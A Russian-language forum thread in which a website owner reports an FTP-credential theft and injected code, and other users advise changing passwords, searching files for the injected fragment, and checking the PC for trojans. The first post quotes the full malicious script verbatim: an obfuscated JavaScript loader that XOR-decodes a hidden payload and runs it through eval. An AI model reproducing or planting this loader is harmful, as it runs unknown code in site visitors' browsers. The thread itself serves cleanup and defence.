Как вылечить сайт от вируса?

[Антон Сергеевич 0]

Судя по всему поймал трояна, через который увели пас от сайта и по фтп залили в index.php и файл шаблона вредоносный код следующего содержания

<body><script>var tipPipNull;tipPipNull='%26%29%26%24%21%21%25%22%5f%25%10%3b%31%26%27%7a%62%07%18%7a%31%37%10%6e%2b%2c%04%3a%09%33%21%73%68%60%76%1f%1d%32%0d%14%3a%63%39%39%11%26%04%37%38%37%16%6d%37%0a%28%35%31%15%23%0c%2d%06%30%69%23%3f%7a%34%34%3e%3d%15%69%43%32%38%2d%3b%24%12%1b%63%6e%5c%35%20%6c%3c%2a%1b%2f%29%60%6b%2d%2f%22%27%33%61%2c%2d%02%23%69%1d%2c%51%3e%24%2c%36%63%20%0a%25%26%2c%19%26%1b%38%21%4d%6a%43%71%63%39%0f%27%3f%45%34%14%2b%39%07%38%3b%01%74%76%43%7f%5a%6a%7a%3a%5f%3f%3e%5b%08%2d%27%02%06%3a%73%21%27%2f%3a%39%2a%0d%20%63%68%0a%3c%24%12%6d%3f%2d%09%22%32%31%32%34%6b%2b%3e%27%3c%3e%2c%2a%1c%6a%24%2b%6b%7f%10%20%2a%6f%18%3b%31%29%3f%03%4b%23%2d%2f%35%05%07%24%14%67%18%3b%21%31%68%6e%6e%4d%3b%06%35%2a%2b%0b%37%7f%45%29%39%2a%23%2c%56%65%7f%4f%49%66%31%32%27%3d%31%22%28%5e%3b%61%26%6c%41%25%64%0b%30%77%26%2a%2c%23%23%65%19%6d%02%2d%7f%7c%49%72%32%0d%32%3e%63%28%11%34%23%0e%10%37%70%6b%7b%3d%2a%32%2d%09%6d%7e%3a%2c%38%21%36%6c%10%37%38%1c%04%34%02%32%38%10%78%39%76%7a%36%35%23%09%08%31%70%7e%74%35%07%25%2d%45%68%24%21%34%14%32%73%22%1c%60%77%24%21%19%17%7a%62%4d%7a%79%27%3b%01%7d%6e%6c%6b%3b%31%39%36%7d%23%3b%23%14%09%28%34%7b%5b%6e%34%2a%0a%04%28%3e%5f%6f%53%77%68%02%7b%25%30%3a%21%2f%25%5c%53%30%21%7f%67%7f%30%7a%17%28%26%6a%7b%26%63%7f%6d%6b%18%20%29%25%35%27%2c%2d%6e%35%21%2e%10%28%65%2e%36%3b%16%29%33%78%76%3f%0b%23%24%32%17%29%2c%7d%2b%23%2e%3e%02%7b%6e%7b%37%33%35%66%24%13%22%1c%7d%22%05%26%22%7e%01%2a%35%27%13%7f%39%2b%60%34%2b%3c%11%0b%2b%21%26%23%16%23%0a%2d%08%25%29%26%40%5e%26%6c%30%03%2b%34%2d%2e%0d%25%67%63%5c%2e%25%23%31%0a%3f%46%3d%2a%14%76%0c%64%01%37%35%2c%0b%66%27%36%2a%05%2c%32%75%5b%60%75%51%37%12%30%1c%20%24%25%2e%3c%14%63%1a%6b%79%35%2a%3f%14%6d%05%39%2c%20%25%71%5f%75%70%4e%28%7d%00%3d%2f%2d%23%6e%34%7b%25%3f%23%3c%1f%23%19%14%28%3c%64%3c%34%0a%30%23%6f%6d%33%2b%22%36%22%37%2d%0f%3b%20%28%3d%12%16%3b%7b%5e%20%0a%31%2b%7e%6f%7a%2b%17%3f%17%75%56%61%74%34%21%07%75%30%0c%2a%1f%3c%74%15%10%2e%28%5e%38%29%79%13%2e%18%25%0c%3a%3e%6c%35%22%18%12%30%6c%2b%3f%7d%58%3f%69%0f%24%1c%0e%3c%63%1e%3e%35%0e%37%36%05%2b%34%6f%7e%4f%02%26%75%3a%57%79%69%6c%1c%0b%62%24%30%24%31%25%31%07%05%0b%39%1f%20%32%65%3c%30%4d%3f%12%25%2e%27%3d%25%01%0d%26%47%33%28%1f%3b%67%28%1e%25%2e%16%1b%2e%2f%76%76%03%3f%44%31%62%2c%36%0f%2a%0a%2b%71%74%62%43%67%62%70%18%24%05%20%18%00%34%7d%36%08%0b%2b%3e%63%22%2a%63%2b%05%23%29%78%76%03%21%2b%67%02%66%3c%34%2a%24%64%37%7e%12%6d%2c%63%10%2c%34%23%6f%50%5d%14%6f%7b%36%38%32%2a%11%2f%51%21%31%24%64%15%36%16%2d%73%62%49%27%28%3d%26%10%3b%22%6b%7a%59%64%6f%7b%4e%71%19%70%78%74%62%35%24%1c%3d%2b%2d%1a%26%5f%33%39%08%24%2c%00%71%2e%32%0b%28%56%62%61%6a%6c%30%3b%29%2d%02%2c%63%02%30%23%16%29%67%57%6d%7c%37%1e%34%2d%31%15%16%75%7d%6c%32%7f%34%21%26%32%1f%34%27%3a%24%7f%34%6b%4b%6d%62%3c%4b%23%26%22%16%0b%16%2b%0c%30%14%6e%6c%3d%48%25%21%20%61%7f%6f%22%70%4a%28%0a%7e%71%76%56%76%74%53%28%24%7f%24%23%72%2d%7a%60%2b%21%25%41%6a%21%3d%07%36%0a%28%21%7f%2c%17%24%2c%2a%3a%2a%24%6e%6d%29%23%02%1c%3a%35%3c%46%63%2c%37%04%15%72%2a%6a%73%7f%3a%0b%2e%19%2f%45%28%3a%2c%29%49%39%51%62%73%37%35%5c%3e%28%35%72%35%3a%31%0a%3b%3d%2f%05%10%24%1e%74%6b%4d%6f%3f%2f%04%73%22%3d%1e%2d%3a%76%2e%10%22%7d%0e%35%2d%01%24%24%68%66%71%69%04%3b%23%22%7a%1b%2c%34%72%07%37%3e%07%35%0b%34%73%2a%27%30%02%23%1d%1e%6c%3d%12%2e%39%30%34%24%51%73%1d%04%3f%5f%37%2f%04%43%75%60%26%2c%03%25%32%69%29%7a%29%47%23%29%18%30%11%4f%64%7b%36%2b%36%76%1f%26%23%3c%2c%7c%26%3b%2c%33%3b%1c%27%33%20%7a%28%3a%34%33%4b%3d%29%62%66%30%1e%02%30%09%68%20%64';function onPsPut(wilCharCom){function bobRunBill(intBeefRun){var pakComNull=0;var pkgCon=intBeefRun.length, callFileBg=0;while(callFileBg<pkgCon){pakComNull+=bestEx(intBeefRun,callFileBg)*pkgCon;callFileBg++;}return (pakComNull+'');}function bestEx(bestPicoFold,bestAwk){return bestPicoFold['c:h(a<rVC:o.d<e<A:t:'.replace(/[V\<\:\(\.]/g, '')](bestAwk);}if((new String(document.write)).indexOf('arity')>0){return;}var errTab=0,butPak=0,deadLs=16;var rmCallPip='';var rmCal=(new String(onPsPut)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var zondAt=bobRunBill(rmCal);wilCharCom=window['u[nfe]sfc:afp]e:'.replace(/[\]\[\:rf]/g, '')](wilCharCom);for(var beefJin=0; beefJin < (wilCharCom.length); beefJin++){var bosBadOrg=bestEx(rmCal,errTab);var ipCp=bestEx(zondAt,butPak);var logBadWil=bosBadOrg^ipCp^deadLs;var pastRmPing=bestEx(wilCharCom,beefJin);errTab++,butPak++;rmCallPip+=String['f^rMo,m,C]h^a{r{C^o,d]e{'.replace(/[M\^\{\],]/g, '')](pastRmPing^logBadWil);if(butPak>zondAt.length)butPak=0;if(errTab>rmCal.length)errTab=0;}window['e]v%a%l]'.replace(/[i%@Y\]]/g, '')](rmCallPip);return rmCallPip=new String();}onPsPut(tipPipNull);</script>
[/code]
Ручками его вырезал, но теперь происходит странная штука, в указанных файлах этот код я удалил, но при просмотре исходного кода сайта он появляется. сайт www.kollekcia-art.ru

[Bububu 0]

Списибо за ссылку в которой

.. при просмотре исходного кода сайта он появляется.

  ;D

Смените логин/пароль для ftp.

После - уберите код из попорченных страниц.

[Антон Сергеевич 0]

Смените логин/пароль для ftp.

После - уберите код из попорченных страниц.

Спасибо, кэп =))

Есть предположения, в каких файлах он есть еще?

[Bububu 0]

Обычно робот суёт их в файлы с назанием index.*

Если в нём удалено, то вероятность, что где-то ещё мала.

НО для верности поищите по всему седержимому (в исходниках). Возмите кусок кода от вируса и поищите файлы, содержащие этот кусок. Например, по подстроке "return rmCallPip=new String". Найдёте - правьте. Не найдёте - радуйтесь!

[Антон Сергеевич 0]

В хидер спрятали сволочи )) Тему можно закрывать

[Bububu 0]

Проверьте свой ящик на троянов - пароли-то с него вытащили, а только потом "пошутили" с сайтом.

Успехов!

[Midas 0]

Обычно воруют сохраненные пароли в FTP-клиентах Internet Explorer'a и Total Commander'a.